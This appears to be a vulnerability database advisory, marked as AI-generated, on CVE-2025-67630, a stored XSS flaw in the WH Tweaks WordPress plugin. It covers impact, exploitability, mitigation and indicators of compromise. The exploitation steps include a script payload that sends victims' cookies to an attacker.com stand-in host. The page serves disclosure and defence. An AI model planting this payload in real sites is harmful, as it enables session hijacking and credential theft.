CVE-2025-67630: 
WordPress vulnerability analysis and mitigation

Overview

CVE-2025-67630 is a Stored Cross-Site Scripting (XSS) vulnerability in the WH Tweaks WordPress plugin developed by webheadcoder. It affects all versions of the plugin up to and including 1.0.2, and was disclosed on December 24, 2025, with the CVE assigned by Patchstack. The vulnerability carries a CVSS v3.1 base score of 5.4 (Medium) (Feedly, Patchstack).

Technical details

The vulnerability is classified under CWE-79 (Improper Neutralization of Input During Web Page Generation — Cross-site Scripting), specifically the stored variant. An authenticated attacker with low-level privileges can inject malicious scripts into fields processed by the WH Tweaks plugin; these scripts are then persistently stored and executed in the browsers of other users who view the affected content. Exploitation requires network access and user interaction (a victim visiting the page containing the stored payload), but no elevated privileges beyond a basic authenticated role (Feedly).

Impact

Successful exploitation allows an attacker to execute arbitrary JavaScript in the context of other users' browsers, potentially leading to session hijacking, credential theft, unauthorized actions performed on behalf of victims, and defacement of web content. The scope is changed, meaning the impact extends beyond the plugin itself to the broader WordPress site and its users. Confidentiality and integrity are both assessed as low-impact per the CVSS scoring, with no direct availability impact (Feedly).

Exploitability

There is no public evidence of active in-the-wild exploitation or weaponized exploit kits targeting CVE-2025-67630 at this time. The EPSS score is approximately 0.029%, indicating a very low probability of exploitation in the near term. No threat actor attribution has been reported, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog (Feedly).

Exploitation steps

  1. Reconnaissance: Identify WordPress sites running the WH Tweaks plugin version 1.0.2 or earlier, using tools such as WPScan or manual inspection of plugin directories.
  2. Authentication: Obtain a low-privileged account on the target WordPress site (e.g., subscriber or contributor role).
  3. Inject Payload: Navigate to the plugin's input field(s) susceptible to stored XSS and submit a crafted payload such as <script>document.location='https://attacker.com/steal?c='+document.cookie</script>.
  4. Payload Storage: The malicious script is stored in the WordPress database without proper sanitization or escaping by the plugin.
  5. Trigger Execution: When an administrator or other user visits the page or admin panel section rendering the stored content, the injected script executes in their browser.
  6. Achieve Objective: The attacker harvests session cookies, performs actions as the victim user, or escalates privileges by targeting an administrator session (Feedly).

Indicators of compromise

  • Logs: WordPress access logs showing POST requests to plugin-related endpoints from low-privileged user accounts containing HTML/JavaScript tags or encoded script payloads.
  • Database: Unexpected <script> tags or JavaScript event handlers (e.g., onerror, onload) stored in WordPress database fields associated with the WH Tweaks plugin options or post meta.
  • Network: Outbound HTTP requests from victim browsers to unknown external domains shortly after visiting pages rendered by the WH Tweaks plugin, potentially carrying cookie or session data in query parameters.
  • File System: No direct file system artifacts expected for stored XSS, but review plugin option values in wp_options table for injected content.

Mitigation and workarounds

WordPress site administrators should update the WH Tweaks plugin to a version beyond 1.0.2 if a patched release is available, or deactivate and remove the plugin until a fix is confirmed. As a general workaround, restrict plugin installation and contributor-level access to trusted users only, and consider deploying a Web Application Firewall (WAF) with XSS filtering rules to detect and block malicious payloads. Monitor the official WordPress plugin repository and Patchstack advisories for patch availability (Patchstack).

Additional resources


Source: This report was generated using AI

Related WordPress vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-86850MEDIUM6.5
  • sku-error-fixer-for-woocommerce
NoNoOct 06, 2026
CVE-2026-88931MEDIUM5.3
  • social-web-suite
NoNoOct 06, 2026
CVE-2026-87841MEDIUM5.3
  • unitechpay-paiements-mobile-money
NoNoOct 06, 2026
CVE-2026-92990MEDIUM5.3
  • sendpress
NoNoOct 06, 2026
CVE-2026-92989MEDIUM4.3
  • sendpress
NoNoOct 06, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management